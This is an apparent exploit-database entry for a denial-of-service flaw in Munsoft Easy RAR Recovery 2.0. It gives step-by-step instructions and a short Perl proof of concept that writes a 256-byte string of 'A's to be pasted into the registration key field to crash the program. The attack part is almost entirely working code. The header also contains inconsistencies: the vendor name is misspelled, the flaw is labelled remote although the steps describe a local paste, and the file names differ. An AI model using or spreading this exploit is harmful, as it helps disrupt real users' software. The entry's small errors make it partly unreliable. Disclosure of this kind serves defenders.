# Exploit Title: Mumsoft Easy Software 2.0 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 22 january 2024 # Vendor Homepage: https://www.munsoft.com/EasyRARRecovery/ # Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyRARRecovery/download/EasyRARRecovery-2.0-Setup.exe # Notification vendor: No reported # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Remote - Denial of Service (DoS) # Steps to Produce the Exploit: # 1 - Execute script # 2 - Copy content exploit.txt # 3 - Help and paste content exploit.txt to registration key... # 4 - Denied of Service #2. Proof of Concept - PoC #!/usr/bin/perl my $exploit = "A" x 256; open(my $f, '>', 'exp.txt') or die "Cannot open file: $!"; print "[+] Creating " . length($exploit) . " bytes.\n"; print $f $exploit; close $f; print "[+] Exploit file created!\n";